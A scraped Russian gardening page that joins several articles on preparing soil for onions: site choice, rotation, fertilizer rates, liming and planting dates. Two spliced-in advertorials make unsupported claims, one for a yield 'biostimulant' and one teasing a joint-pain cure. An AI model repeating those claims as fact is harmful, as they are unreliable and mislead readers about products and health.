0 просмотров
Рейтинг статьи
1 звезда 2 звезды 3 звезды 4 звезды 5 звезд
Загрузка...

Подготовка почвы под лук осенью

Выбор участка и подготовка почвы для лука

Чтобы получить достойный урожай репчатого лука необходимо не только правильно подобрать участок и соседей по грядке, но и принять во внимание предшественников лука – я имею ввиду те овощные культуры, которые росли там, где вы планируете разместить луковую грядку. Что уж говорить про почву? Почва для лука нуждается в правильной подготовке. Поговорим обо всех этих хитростях.

Оптимальный участок для лука.

Участок под лук должен быть ровным, открытым и, желательно, максимально солнечным. Непригодны для лука затененные гряды, расположенные вблизи деревьев. Необходимое, но не единственное условие для плодотворного выращивания любого сорта и вида лука — свободные от сорняков почвы.

Лучшими овощными предшественниками лука являются те культуры, под которые Вы вносили значительные дозы органических удобрений. Это могут быть огурцы, кабачки, тыква, ранняя / белокочанная / цветная капуста, ранняя картошечка, бобы, овощной горох, помидоры, зеленые культуры. Сам же лук репчатый является хорошим предшественником практически для всех огородных культур. Если Вы заинтересовались, можете более подробно прочитать про то, как планировать огород в зависимости от размещения овощей в прошлом году.

При размещении лука на приусадебном участке также следует знать, что он совмещается с капустными культурами, свеклой, морковкой, петрушкой, всеми томатами, салатом, шпинатом, кресс-салатом, а также с чабером садовым, цикорием и не совмещается с горохом и фасолью. Узнайте также об оптимальном соседстве других овощей.

Варианты комбинированных грядок с луком.

Лук можно и даже нужно выращивать совместно с другими овощными растениями. Много овощей можно получить с одной небольшой грядки, если знать как.

Очень популярно выращивание лука совместно с морковью, петрушкой и редисом. На грядочке вначале в 4 ряда с промежутками приблизительно 20—25 см высаживаем лук-севок. Луковицы в рядочках размещаем через 10 см. В этих же рядах между лучком высеваем редис – ему хватит места. Затем делаем следующие ряды, чередуя морковь и петрушку – всего 5 рядов – три моркови и два петрушки. Вначале убираем с гряд редис, затем лук. Оставшиеся культуры – петрушка и морковь – после этого будут еще развиваться и к концу своего вегетационного периода дадут нам прекрасные развитые корнеплоды.

Второй популярный вариант — выращивание лука-севка, моркови, шпината, кресс-салата, шнитт-лука и томатов. На грядке приблизительно через 8 см высеваем в такой последовательности: морковь, лук, шпинат, свободный ряд, шнитт-лук и кресс-салат. В середине гряды в свободном ряду высаживаем томаты. Вначале будем убирать шпинат и кресс-салат, чуть позже – шнитт-лук, а затем — лук-севок. После сборки томатов формируются корнеплоды моркови. Культуры на такой комбинированной грядке хорошо уживаются, а запах лука к тому же отлично препятствует хулиганствам морковной мухи.

Будьте внимательны: если на участке растут многолетние луки, то Ваши посевы репчатого лука рекомендуется удалить от них.

Какую почву любит лук?

Оптимальная почва для посадки лука – суглинистая (на них лук получается ядренее) или супесчаная (на них лук быстрее вызревает). А вот почва тяжелая и глинистая приведет к редким всходам, которые объясняются тем, что в такой почве на луковицах образуется плотная корка, мешающая нормальному росту.

Лук любит свет и умеренно влажную почву.

Почва для лука – грамотная подготовка.

Почву под лук нужно обрабатывать тщательно и желательно заняться этим осенью. Сразу после уборки предшественника – овоща, который рос на данном месте, – проводят лущение (перекопка или рыхление почвы на глубину 10 см), а позднее — глубокую перекопку. Перед перекопкой осенью вносим органические удобрения и 2/3 дозы минеральных (1/3 оставим на весну). Кроме перегноя в расчете 5 кг/м 2 и компостов 8 кг/м 2 можно и нужно использовать куриный помет 0,2 кг/м 2 . Рекомендуемым удобрением для лука является также и древесная зола 0,5 кг/м 2 .

В осеннюю заправку принято вносить на 1 м 2 :

  • 20 г двойного суперфосфата;
  • 15 г хлористого калия.

При выращивании лучка на торфяных почвах увеличьте дозы фосфорного удобрения в 1,5 раза, а азотные удобрения не вносите вовсе.

Для того, чтобы урожай лука порадовал, почву на участках с большой кислотностью необходимо заранее известковать. Для этого вносим 200—700 г известковых туков на 1 м2. Однако, будьте осмотрительными, лук можно сажать только на 2 год после манипуляций с известью.

Поздней осенью почву еще раз перекапываете на глубину 20. В оставшееся до заморозков время участок содержите в чистом от сорняков состоянии.

Весенняя обработка почвы под лук начинается с тщательного рыхления участка для большего сохранения влаги. Затем, ближе к посадке, почву перекапываем на глубину 15 см, вносим минеральные удобрения — 20 г/м 2 аммиачной селитры и оставшуюся 1/3 суперфосфата и хлористого калия), после чего хорошо разравнивают и рыхлят, готовят гряды.

Если Вы не подготовили почву под лук осенью – не поздно заняться этим весной. Необходимо внести азотные, калийные и, конечно, фосфорные удобрения. В каких количествах? На 1 м 2 – 4г азота, 6 г фосфора и 5г калия. Это приблизительно 60г нитрофоски. Интересно, что с помощью увеличения / уменьшения количества удобрений, вы сможете координировать рост лука. Внесете больше азотных – получите больше зелени, но меньшие луковицы. Не вносите свежий навоз на луковую грядку, если готовите ее весной – используйте компост в расчете 4 кг на м 2.

Высоту гряды доводят до 15 см, а ширину — до 1 м. Выращивать на поднятых грядах лук предпочтительнее, чем просто на ровной поверхности. Высокие грядки лучше прогреваются, в них складывается более благоприятный водный воздушный режим. Кроме того, за грядой легче ухаживать. Высокая гряда просто необходима на тяжелых почвах. А вот на легких, хорошо прогреваемых и проветриваемых почвах формирование гряд вовсе не обязательно.

Репчатый лук выращивают для получения севка , репки , зеленых листьев (пера) и семян (чернушки). Крупную луковицу можно получить посадкой репки, выборка (луковиц диаметром до 4 см), севка, посевом семян в грунт и посадкой рассады. Лук репчатый от семени до семени выращивают обычно три года. В первый год из семян мы получим севок, на второй год из севка получим крупную маточную луковицу. На третий год из этой маточной луковицы можно вырастить семенное растение и получить семена, чтобы снова начать все сначала.

Теперь Вы знаете, какой должна быть почва под лук, и какими оптимальные соседи и предшественники лука.

Готовимся к посадке лука осенью: как проводить удобрение почвы

Лук – всемирно известная культура, которая имеет очень давнюю историю выращивания. Уже более 4 тысячелетий население практически всех областей земного шара успешно разводит ее, получая высокие урожаи обладающего многими полезными свойствами овоща.

Особенности выращивания лука

Луку присуща повышенная стойкость по отношению к воздействию низких температур. Всходы растения способны легко выдерживать холода до -1 C, а у взрослых экземпляров устойчивость к морозу еще выше, до -5 C. Идеально подходит для полноценного развития растения и способствует его интенсивному росту температура в пределах 12-26 C.
Длительность вегетационного периода у разных сортов этой культуры отличается, в целом она укладывается в рамки 90-180 дней.

Существует несколько способов выращивания лука:

  • в двулетней культуре (этот способ применяется чаще всего и давно уже стал традиционным);
  • из севка, который предлагается на продажу в специализированных магазинах;
  • из выборки;
  • из семян.

Сроки и правила посадки растения и ухода за ним определяются выбранным способом. Но в отношении грунта требования у этой культуры отличаются редким постоянством. Какие же почвы нужны луку? Как правильно выбрать и подготовить место для его посадки?

Выбор места для посадки

Чтобы дело было успешным, начинать его следует с предварительной подготовки. Посадка лука не является исключением из общего правила. Прежде всего, нужно определиться с местом для высадки растений. Лучше всего этой культуре подходят хорошо освещаемые в течение всего дня солнечными лучами, в крайнем случае, совсем немного затененные участки земли.

Категорически не рекомендуется высаживать растение в низменных местах: хорошего урожая и полностью здоровых насаждений при несоблюдении этого условия можно не ожидать.

Для выращивания всех сортов растения используют посадку на высокие грядки. Такой способ разведения культуры вполне обоснован, так как грунт, расположенный непосредственно под луком, легко и быстро прогревается, обеспечивая растению максимально комфортную для роста и развития среду.

Наиболее пригодны для посадки плодородные, богатые питательными элементами, нейтральные суглинистые почвы, обладающие хорошей воздухопроницаемостью. Растение хорошо реагирует на умеренную влажность грунта, а вот земля с повышенной кислотностью ему не подойдет. Если участок, где планируется сажать культуру, характеризуется кислым грунтом, его нужно предварительно подготовить: за 2-3 года до планируемой высадки почву нейтрализуют, добавляя в нее известь.

Нам постоянно пишут письма, в которых любители садоводы переживают, что из-за холодного лета в этом году плохой урожай картофеля, помидоров, огурцов, и других овощей. В прошлом году мы публиковали СОВЕТЫ, по этому поводу. Но к сожалению многие не прислушались, но некоторые все же применили. Вот отчет от нашей читательницы, хотим посоветовать биостимуляторы роста растений, которые помогут увеличить урожай до 50-70%.

Советуем ЗАБЛАГОВРЕМЕННО готовиться к дачному сезону, обратите внимание на этот биопрепарат. Очень много позитивных откликов.

Принципы севооборота при посадке

При выборе места, на котором будет расти культура в текущем году, важно придерживаться правил севооборота. Сажать ее на прежнем участке земли можно только тогда, когда с момента сбора предыдущего урожая пройдет не менее 3 лет.

Хорошо развиваются растения, предшественниками которых были овощные сорта, грунт под которые хорошо заправлялся: огурцы, помидоры, раннеспелая капуста, морковь, тыква, пасленовые или бобовые представители флоры. Если грядки с луком расположить в непосредственной близости от грядок с морковью, они не только будут отлично расти, но и предохранят друг друга от поражения огородными вредителями. Нельзя высаживать эту культуру на тех участках земли, которые в прошлом году удобрялись свежим навозом.

Правила подготовки грунта для последующей посадки растений осенью сводятся к трем простым шагам:

  1. перекопать почву на глубину лопаты;
  2. очистить ее от сорняков;
  3. обильно удобрить выбранный участок.

По весне почву необходимо разрыхлить граблями или перекопать на небольшую глубину, чтобы не допустить нарушения ее структуры и быстрого испарения из нее влаги.

Тонкости удобрения почвы

Гарантией получения хорошего урожая выступает правильное удобрение растений. Своевременное и достаточное подкармливание культуры полезными для нее веществами и микроэлементами способствует полноценному развитию лука, его сопротивляемости опасным заболеваниям и повышению устойчивости к неблагоприятным внешним условиям.

Органические удобрения как средство подкормки

Начинают готовить грунт для высаживания этого овоща еще осенью. Для его обогащения питательными компонентами допустимо использовать как органические, так и минеральные удобрения. Однозначный ответ на вопрос, какие из них более эффективны, дать затруднительно. Из первых чаще всего в осенний период в почву вносят навоз, птичий помет или более доступный для многих дачников компост. Хорошего результата позволяет получить смешивание этих природных веществ с торфом. Добавление в почву небольшого количества золы также пойдет луку на пользу.

Осеннее обогащение грунта с помощью органических компонентов проводят по следующей схеме: 5 кг перегноя (компоста, несвежего навоза) на 1 кг золы распределяют по поверхности 1 м² земли.

Применение средств природного происхождения не только значительно повышает содержание в грунте питательных веществ, но и делает лучше его структуру. Почва становится более рыхлой, легкой, а значит, через нее к корням растений проникает больше кислорода и влаги. Также органические компоненты повышают степень усвояемости луком минеральных составов.
Навоз и помет птиц содержат в себе большое количество азота, который крайне важен для быстрого роста растений и их здорового развития. После внесения азотсодержащего удобрения луковые перья начинают расти прямо на глазах. А вот недостаток этого элемента замедляет развитие овоща, ослабляет его и снижает урожайность.

Минеральные удобрения и их применение

Наибольшего эффекта при выращивании лука позволяет добиться сочетание в его питании естественных удобрений со специально разработанными минеральными средствами.
Особую популярность приобрели комплексные препараты (Фертика, Осень). Применяют их из расчета до 0,1 кг на 1 м² грунта. Не менее эффективно будет удобрение будущего места посадки лука составом, самостоятельно приготовленным из нескольких компонентов. По осени в землю вносят 20 г суперфосфата и 10 г калия 1 м², а с приходом весны добавляют к предыдущей подкормке еще по 10 г обоих веществ и 15 г аммиачной селитры.

Прекрасно зарекомендовали себя для осенних подкормок минеральные удобрения с высоким содержанием калия и фосфора. Одно из преимуществ их применения – невысокий расход: на 1 м² почвы производители советуют вносить не более 30 г препарата.

Если заправить грунт по осени не получилось, это можно сделать в весенний период. Существуют специальные составы для подкормок луковых насаждений в это время, например, пользуется заслуженной любовью огородников препарат Фертика «Весна-Лето». Вносить его нужно из расчета до 100 г на 1 м² почвы.

Поскольку корни растения располагаются в верхних слоях грунта, минеральные удобрения лучше всего заделывать на небольшую глубину. В этом случае луку будет легче получать питательные элементы.

Органика и химия при подготовке почвы под лук: за и против

Для обогащения почвы при возделывании луковой культуры долгое время использовались средства исключительно органического происхождения. Однако минеральные питательные препараты после своего появления быстро завоевали пальму первенства в этой области. Их любят применять как крупные сельхозпроизводители, так и обладатели небольших дачных участков. Преимущества их очевидны: их проще и удобнее использовать, легче достать, чем натуральные, стоят они дешевле, а спектр их воздействия крайне широк.

При выращивании лука применение органических компонентов для питания растения имеет весьма существенный недостаток: из-за своей структуры они обладают способностью задерживать в почве много влаги, что может привести к загниванию луковиц.

В этом плане минеральные составы намного превосходят питательные средства природного происхождения: обладая прекрасными абсорбирующими свойствами, они поглощают избыточную влагу. При их использовании не происходит застаивания воды в глубинных слоях грунта. Влага, в которой растворяются полезные для роста растения компоненты, поступает прямо к корневой системе, что существенно облегчает процесс питания.

Но даже несмотря на явный проигрыш агрохимикатам в отношении влагоотдачи, органические удобрения при подкармливании луковых насаждений продолжают пользоваться большой популярностью. И не стоит торопиться называть их использование нерациональным.

Обработка луковиц перед посадкой

Луку присуща такая особенность, как активное всасывание питательных элементов из почвы. При возделывании культуры сильно уменьшается количество гумуса, содержащегося в поверхностных слоях грунта, а значит, снижается плодородие земли. Единственный способ возрождения плодородного слоя почвы – внесение в нее по осени питательных компонентов органической природы.

Получить хороший урожай и вырастить крупные, здоровые луковицы на своем участке вполне возможно. Нужно только не забывать о подкормке растения, начинать которую следует еще с осени. Стоит лишь обеспечить лук необходимыми для его полноценного развития полезными элементами, и результат не разочарует!

И немного о секретах Автора

Вы когда-нибудь испытывали невыносимые боли в суставах? И Вы не понаслышке знаете, что такое:

  • невозможность легко и комфортно передвигаться;
  • дискомфорт при подъемах и спусках по лестнице;
  • неприятный хруст, щелканье не по собственному желанию;
  • боль во время или после физических упражнений;
  • воспаление в области суставов и припухлости;
  • беспричинные и порой невыносимые ноющие боли в суставах.

А теперь ответьте на вопрос: вас это устраивает? Разве такую боль можно терпеть? А сколько денег вы уже «слили» на неэффективное лечение? Правильно — пора с этим кончать! Согласны? Именно поэтому мы решили опубликовать эксклюзивное интервью Олега Газманова, в котором он раскрыл секреты избавления от болей в суставах, артритов и артрозов.

Пошаговая инструкция по подготовке грядки под лук осенью

При озимой посадке лука удается не только получить ранний урожай, но и сэкономить время по уходу за растениями. Хотя культура эта неприхотливая и холодостойкая, чтобы репки не вымерзли и не деформировались, важно правильно подготовить участок перед посадкой.

Зачем готовить грядки под зиму

Лук — выносливое растение, но для полноценного развития ему требуются определенная структура почвы, достаточное количество питательных веществ, умеренная увлажненность. Это обеспечит хорошую урожайность и выживание культуры в морозы.

Подготовка участка включает:

  • рыхление:
  • очистку от сорняков;
  • внесение удобрений;
  • регуляцию кислотности и структуры грунта;
  • мульчирование.

Если не проводить эти меры, высок риск, что лук не взойдет.

Когда готовить грядки

Конкретные сроки зависят от климатических условий. При этом учитывают следующее:

  1. Лук должен успеть укорениться, но не дать всходов, иначе перья зимой погибнут, растение вымерзнет или будет серьезно угнетено.
  2. Сухость лучше, чем дожди: пересохшую грядку поливают, а в переувлажненном грунте лук сгниет.

Озимую культуру высаживают примерно за месяц до морозов, поэтому сроки подготовки грядок такие:

  • в Подмосковье и средней полосе России — середина октября;
  • на юге — середина–конец ноября (в Крыму и на Кавказе — начало декабря);
  • в Сибири, на Урале и в северных регионах европейской части страны — сентябрь.

При этом важно следить за прогнозами синоптиков.

Подготовка грядки под лук осенью

Чтобы получить богатый урожай овощей в следующем сезоне, готовиться начинают еще осенью.

Избавление от сорняков

Делянку для озимого лука тщательно очищают от:

  • растительных остатков с лета: ботвы, корней, подгнивших плодов;
  • сорняков: опасна зеленая масса, на которой остаются вредители.

При необходимости используют гербициды. Так, если участок был заражен пыреем, другого надежного способа полностью избавиться от него нет.

Внимание! При обработке участка такими средствами соблюдают нормы, установленные производителем. Если посеять лук слишком рано, он впитает ядохимикаты.

Перекапывание

Лук как при весенней, так и при осенней посадке нуждается в рыхлой и аэрированной почве. Поэтому при разбивке грядок и подготовке к посеву грунт рыхлят как минимум на штык.

Как подготовить целинный участок, где раньше ничего не выращивалось? Для этого используют двойную перекопку:

  1. Берут лист железа, фанеры или широкий кусок пленки.
  2. Верхний слой почвы срывают на штык вглубь, снятую землю откладывают в сторону на лист или пленку.
  3. Обнажившийся грунт перекапывают еще раз на штык лопаты.
  4. Образовавшуюся впадину засыпают снятой и измельченной землей, которую перетирают руками в перчатках.

Эта технология подходит для тяжелых черноземов с толстым гумусным слоем (например, как в Воронежской или Тамбовской областях). Если гумуса меньше штыка лопаты, такой способ лишь поднимет безжизненный слой глины или песка. Если есть сомнения, землю бурят или выкапывают достаточно глубокую яму в стороне.

При перекопке поднимают уровень грядок, закидывая на них почву с дорожек, образующихся по периметру. В идеале грядка должна возвышаться на 12–15 см, чтобы по дорожкам вокруг отводилась лишняя жидкость и участок не заболачивался.

Обогащение состава почвы

При осенней высадке лука используют только биогумус (например, возникающий при выращивании калифорнийских червей), хорошо переработанный компост или низовой торф.

Кроме органики, в почву вносят и синтетические удобрения (дозировки на 1 м 2 ):

  • мочевину — 25 г;
  • суперфосфат — 15–20 г;
  • хлористый калий — 20 г.

Предварительно добавляют древесную золу из расчета не менее 15 г на 1 м 2 грядки. Это средство используют в любых количествах: излишки просто не усвоятся и останутся в почве на будущее.

Изменение структуры грунта

У лука слабые корни, поэтому он нуждается в рыхлой и хорошо аэрируемой почве:

  1. При выращивании на песке или супеси предварительно вносят глину для скрепления грунта. Количество вещества зависит от состава почвы, но обычно достаточно 1 ведра на 2 м 2 .
  2. На суглинке, тяжелых черноземах и аналогичных почвах добавляют отсеянный и хорошо прокаленный мелкий речной песок (1 ведро на 1 м 2 ). Он сделает грунт более рыхлым и воздушным.
  3. Овощ предпочитает химически нейтральную почву, поэтому перед посевом комок землю кладут в теплую воду, оставляют на пару дней, фильтруют и проверяют кислотность лакмусовой бумажкой. При низких значениях pH в грунт добавляют известь или мел. При высоких показателях вносят древесные опилки. Оптимальный pH для лука — 7,5.

Если структура почвы и показатель кислотности в норме, культуру сразу высаживают.

Мульчирование и другие процедуры

После внесения удобрений почву дезинфицируют, особенно если раньше на участке отмечались вспышки серой гнили, мучнистой росы, ржавчины, фузариоза. Для этого используют раствор медного купороса (2 ст. л. на 10 л воды). Расход: 1 ведро на 1 м 2 . Средство уничтожает споры грибков, препятствуя заражению плантации лука.

Важно! Вместе с грибками купорос убивает и почвенные бактерии, поэтому обеззараживание проводят не чаще 1 раза в 3-4 года. Весной грядки проливают раствором «Фитоспорина» или другого биопрепарата.

После высадки лука грядки мульчируют соломой, сеном или сухими стеблями растений. Слой делают толщиной в 10–15 см.

Особенности подготовки грядок и севка

Для лука участок готовят с учетом таких требований:

  • глубина рыхления — минимум на 5 см глубже зоны роста корней у взрослых растений;
  • грядку возвышают, чтобы семена не загнили.

Подготовка лука-севка к посадке включает:

  • тщательный отбор: все поврежденные, гнилые или больные экземпляры утилизируют;
  • дезинфекцию: чтобы избежать ржавчины и гнили, семенной материал замачивают в растворе марганцовки, медного купороса или комплексного фунгицида.

При посадке осенью закладывают на 10–15% больше севка на случай гибели его части.

Советы опытных дачников

Технология возделывания осеннего лука несложна, но небольшие хитрости повысят урожайность:

  1. При разбивке грядок борозды делают таким образом, чтобы они тянулись с севера на юг. Это улучшит освещенность растений и скорость прогревания почвы весной.
  2. Участок выбирают на возвышенности, не в тени. Так грунт быстрее прогреется весной, и семена раньше дадут всходы.
  3. Лук не сажают 2 года подряд на одном месте или после чеснока.
  4. Рядом с озимой культурой высаживают кабачки, морковь или зелень.

Заключение

Высаживание лука под зиму — популярная технология возделывания культуры. Чтобы овощи не погибли в морозы, важно правильно подготовить участок. Для этого его очищают от растительных остатков, тщательно перекапывают, вносят питательные вещества.

Если требуется, кислотность почвы корректируют мелом или опилками. После посадки севка грядки мульчируют соломой или сеном.

Подготовка почвы для посадки лука

Содержание статьи:

Что вы знаете о луке? Ну, кроме того, что без него не обходится практически ни одно горячее блюдо. Да и среди холодных закусок лук поистине может считаться королем. Его тушат, жарят, маринуют, подают сырым. С ним самое вкусное жаркое, он должен быть в супах и борщах, без него салаты считаются осиротевшими. В луке съедобно все – сама луковица и зеленые ростки из нее. Его десятки сортов и видов, отличающихся по вкусу, он может быть белым или красным, зеленым, золотистым, всегда с острым запахом, от которого не произвольно катятся слезы. В том или ином виде лук всегда нужен, без его аромата немыслимы блюда из мяса, рыбы, овощей.

Лук – богатейший источник витаминов

Если зеленая часть этого уникального растения хранится недолго и подается к столу исключительно в свежем виде, то лукавица может храниться почти полгода, сохраняя все свои целебные свойства. Чем же так богат этот ценный продукт? Прежде всего витамином С, который необходим человеку для поддержания иммунитета. Уникальное свойство лука, известное человечеству вот уже 4000 лет – это его антисептические возможности. Это растение является природным антибиотиком. Не даром, во время инфекционных эпидемий рекомендовали держать в комнатах дольки луковиц – первая простая защита при вирусах, передающихся воздушно-капельным путем.
Зимой употребления лука в сыром виде обязательно, чтобы снизить риск заболевания простудами и гриппом. Из него делают настойки, компрессы, смеси, давят сок и растирают. Существуют сотни лечебных рецептов и способов применения, кроме стандартного употребления в пищу.

В кулинарии лук совершенно универсален – его можно использовать как приправу, дополнение, а также основное блюдо. Его жарят кольцами, делают из него мармелады, маринуют в уксусе и просто едят сырым.

Согласитесь, при таком огромном выборе использования, лук является очень ценным растением.

Каким бывает лук?

Мы чаще всего имеем дело с обыкновенным репчатым луком, который растет как репка – золотистая луковица под землей и зеленые побеги. Как уже говорилось, в таком луке прекрасно все – и сама луковица, сочная и ароматная, а также зеленые побеги «перья», которые мы едим сырыми. Репчатый лук прекрасно хранится зимой и остается сочным весь период хранения. Он может быть белым или темно-фиолетовым в зависимости от сорта. Когда речь идет об урожайности репчатого лука, мы говорим о количестве собранных луковиц. Именно эта часть определяет урожайность.

Если говорить о таком сорте, как лук-порей, то в нем самым ценным является наземная часть.

Что любят выращивать на своих участках огородники кроме обычного репчатого?

Это самые распространённые виды этого растения, которые достаточно просто вырастить на своем приусадебном участке.

Что высаживать и как выращивать?

Учитывая огромное разнообразие этой культуры, вначале необходимо определиться, что вы будете выращивать. Это может быть только один вид, например обычный репчатый, для зимней заготовки или это будет лук, который интересует вас исключительно в его наземной зеленой части. Это статья поможет понять основные принципы выращивания самой распространённой культуры – репчатого лука, который очень важен для потребителя.

Что любит репчатый лук?

Что любит такое растение, как обычный репчатый лук? Чтобы вырастить большую и сочную луковицу, правильной формы и без дефектов, необходимо придерживаться правил, о которых и пойдет речь в данном обзоре. Прежде всего, нужно правильно выбрать участок под посадку. Это должен быть хорошо освещенный и продуваемый участок. Земля должна быть плодородной. Дело в том, что это растение имеет крайне скудную корневую систему, поэтому земля должна быть обогащена минералами и нужными элементами по всему объему. В почве бедной лук расти не будет.

Типы почвы и как сделать ее пригодной для выращивания лука

Идеальным для лука будет чернозем. Но даже его необходимо будет удобрять. Подойдут также торфяники и суглинки, но при условии систематического правильного ухода. Песчаники для этой цели не подходят. Если суглинок не удобрять, то выращенный на нем лук будет не вкусным и не сможет долго храниться.

Почва должна быть умеренно влажной. Излишняя вода не принесет пользы этому растению, но и засуха будет опасной. Поэтому так необходимо открытое солнце, чтобы излишки влаги испарялись естественным путем.

Подготовка почвы для посадки лука

Залог хорошего урожая – это правильная подготовка почвы для посадки. Почву готовят в два этапа – зимой, после сбора урожая и весной перед посадкой. Осенью, когда урожай собран, необходимо убрать из земли все лишнее, например, остатки растений. После этого почва глубоко, на полный штык лопаты, перекапывается с оборотом пласта. На зиму землю не ровняют, чтобы морозы уничтожили с поверхности грунта все болезнетворные микробы. Осень в почву необходимо заложить органические удобрения. Этот метод важен, поскольку органике требуется время, чтобы впитаться в почту. Способствует этому процессу и весеннее таяние снега.

Особенностью выращивания лука является тот факт, что переизбыток удобрений также опасен, как и их недостаток. Чтобы избежать подобной ошибки, ркомендуется насыщать грунт удобрениями в два этапа – осенью и весной. Осенью можно заложить перегной и часть фосфорно-калийных удобрений, а весной доложить их с добавлением азотных. Поэтапное внесение удобрений гарантирует их равномерное распределение в земле, что, как уже говорилось, важный момент.

За зиму произойдет естественный процесс усвоения полезных веществ, а также уничтожаться все организмы, способные вызвать болезни почвы.

Подготовка почвы под посадку лука весной

Весной необходимо приступать ко второй части – землю нужно тщательно боронить и ровнять ранней весной, как только сойдет снег. Грунт после осенней обработки крупный и непригодный для посадки. Ранняя весенняя обработка необходима для того, чтобы с поверхности почвы испарилась ненужная влага. К тому же необходимо довнести остатки удобрений и тщательно разбить все крупные комочки, чтобы почва была равномерная.

В зависимости от типа почвы, ее либо рыхлят (супесчаные грунты), либо перекапывают (средне-суглинистые, суглинистые). При перекопке в землю дополнительно попадает кислород, который необходим для развития растения.
Удобрения вносят перед перекопкой и рыхлением, но после просушки земли. Все это делается уже заранее перед высадкой семенного материала.

Способы посадки лука

Лук высаживают либо семенами, либо лукавицами. В зависимости от этого готовят грунт. Семена требуют абсолютно равномерного грунта, без комочков, рыхлого и насыщенного удобрениями. Семена не смогут пробиться, если земля плохо и некачественно разрыхлена.

При посадке луковиц, земля также должна быть достаточно рыхлой, чтобы можно было опустить луковичку на достаточную глубину. Высаживают рядками, расстояние между которыми должно быть не менее 30 сантиметров на глубину 6-10 сантиметров.

Для семян также нужно готовить грядки с такими же условиями, глубина посадки не меньше 5 сантиметров.
Эффективная посадка культур возможна, если вы будете соблюдать эти правила.

Когда лучше сажать лук?

Идеальное время для лука – это конец апреля или начало мая. Первым рекомендуется сажать севок – маленькие луковицы. Он лучше переживет возможные заморозки и не даст преждевременных семенных стрел. Если высаживать севок позже, то он не успеет должным образом развить корневую систему. Затем в мае высаживаются семена различных сортов.

Залог хорошего урожая

Главный секрет хорошего урожая лука – это правильная подготовка почвы для посадки лука весной и осенью, ведь именно состав грунта определит вкусовые качества и срок хранения. Но и уход крайне важен – во время роста растения, примерно через две-три недели после посадки, рекомендуется внести органические удобрения, например куриный помет из расчета один к двенадцати. Также делают аммиачный раствор – на ведро воды добавляют 30 грамм аммиачной селитры. Когда луковица начинает формироваться также делают подкормку удобрениями – примерно 30 грамм суперфосфатов на десятилитровое ведро воды.

Также необходимо регулярно рыхлить землю между грядками – это избавит от лишней влаги и насытит грунт кислородом.

После того, как лук взойдет, необходимо сделать прореживание. Если вы хотите вырастить крупные луковицы – пропалывайте без жалости, для хорошего урожая необходимо место.

Не смотря на то, лук любит хорошую и плодородную почву, вырастить его все-таки вполне возможно. Достаточно соблюдать некоторые правила:

  • правильно выбрать участок для посадки лука. Он должен быть ровным, хорошо просушенным и светлым.
  • определиться с типом грунта. Лук не будет расти в песке. Определить ваш тип почвы можно следующим образом: размягчите горсть земли в воде и попытайтесь скатать из него мяч. Песчаная почва рассыплется, глина и суглинок скатаются в шар. В зависимости от типа почвы подберите удобрения.
  • лук любит плодородную почву, но удобрения должны быть внесены равномерно и без излишков.
  • почву для посадки лука необходимо хорошо боронить и ровнять. Чем равномерней обработана земля, тем лучше в ней будут расти семена.
  • прореживать лук дважды за время роста и регулярно рыхлить землю на грядках.

Надеемся, что наши советы помогут вам вырастить прекрасный урожай такого ценного продукта, как лук. Удачи!

Посадка репчатого лука разными способами в закладки 3

Лук — несложная в выращивании культура, но, чтобы урожай вырос на радость огороднику, требуется выполнить некоторые условия. При правильной посадке и должном уходе лук будет крупным и сохранит полезные свойства в течение всей зимы.

Какую почву любит лук

Место под посадку лука нужно выбирать хорошо освещённое солнцем, без застоя воды, иначе в дождливое лето растения могут сгнить или будут плохо храниться осенью и зимой. Грядка под лук должна быть хорошо обеспечена питательными веществами, но при этом в почву нельзя вносить свежий навоз. Хорошо размещать лук там, где в прошлом году росли культуры, под которые закладывался перегной или компост: огурцы, бахчевые, капуста, бобовые, ранний картофель. Лук не любит кислую почву, для него оптимальна нейтральная с показателем pH=6.4–6.7, поэтому с осени можно внести раскислитель в виде извести-пушонки, известняковой или доломитовой муки (нормы определяются по инструкции исходя из состава почвы). Можно добавлять древесную золу по 300–400 г на квадратный метр площади. Такого запаса питательных веществ будет вполне достаточно, и не будет необходимости вносить минеральные удобрения, что особенно важно для огородников, предпочитающих органическое земледелие.

Лучшие соседи для лука

При смешанном выращивании растений можно высаживать лук рядом с капустой, свёклой, зеленными культурами, но больше всего огородники любят сажать лук вместе с морковью, чередуя ряды. При таком способе посадки лук защищает морковь от морковной мухи, а морковь лук — от луковой мухи. Такое соседство на одной грядке даёт превосходный результат.

Подготовка к посадке

После приобретения лука-севка его нужно перебрать, отбраковав все высохшие и подгнившие луковички, прогреть, чтобы он не ушёл в «стрелку» и не был поражён грибком, так как неизвестно, в каких условиях его хранили зимой. Для этого лук размещают в тёплом месте, лучше всего у батареи, и держат там несколько суток (15–30). Если нет возможности прогревать лук столько времени, то можно это сделать перед самой посадкой по-другому: залить отобранный севок горячей водой температурой 70 о C на 20 минут, а затем опустить его в ледяную воду на такое же время — это исключит возможность стрелкования. Для предотвращения грибковых заболеваний лука его на полчаса замачивают в слабом растворе марганцовки или в биопрепаратах (Планриз, Гамаир, Фитоспорин) на 1–2 часа.

Сроки посадки

Лук можно сажать не только весной, но и под зиму.

Посадка под зиму

Для посадки осенью лук сажают только севком. Выбирают самые мелкие луковички, некоторые огородники ласково называют их «младенчики». Сорта подбирают холодостойкие:

  • Даниловский,
  • Стригуновский,
  • Штутгартен Ризен,
  • Арзамасский.

Грядку перекапывают, разравнивают граблями и нарезают бороздки на расстоянии 15 см друг от друга. Заранее надо запасти землю или компост, который оставляют в непромерзающем месте. Проводят посадку после первых заморозков, обычно с 5 по 20 октября, раскладывая луковички в борозды на расстоянии 6–7 см, а затем присыпая их непромёрзшей землёй. Торопиться с осенней посадкой не стоит, так как, если будет стоять тёплая погода, лук начнёт прорастать, а это может привести к его гибели (выпреванию, вымерзанию). Такая посадка даёт возможность получить более ранний урожай, растениям не будет страшна луковая муха, так как к её появлению ростки уже окрепнут.

Посев лука весной

Лук относится к холодостойким культурам, поэтому весной его высаживают довольно рано: почва должна прогреться до 10–12 о С в верхнем слое, а температура воздуха — до 3–5 о С. Небольшие заморозки луку не страшны. Обычно посев проводят в первой декаде мая. Хорошо выбрать дни под знаком Овна, Тельца, Рака, Стрельца, Козерога, Рыб, а так как растение формирует урожай под землёй, то на убывающей луне.

Способы посадки лука весной

Высаживать лук весной можно несколькими способами:

Высаживание лука-севка

Если земля на грядке была перекопана осенью, весной её надо прорыхлить граблями, а если нет, то вскопать и разровнять. Наметить рядки на расстоянии 20–25 см и высадить обработанные луковички на глубину 1 см через 5–10 см друг от друга, присыпать землёй. При посадке севком лук вырастает за один сезон в товарную луковицу.

Посев семенами в грядку

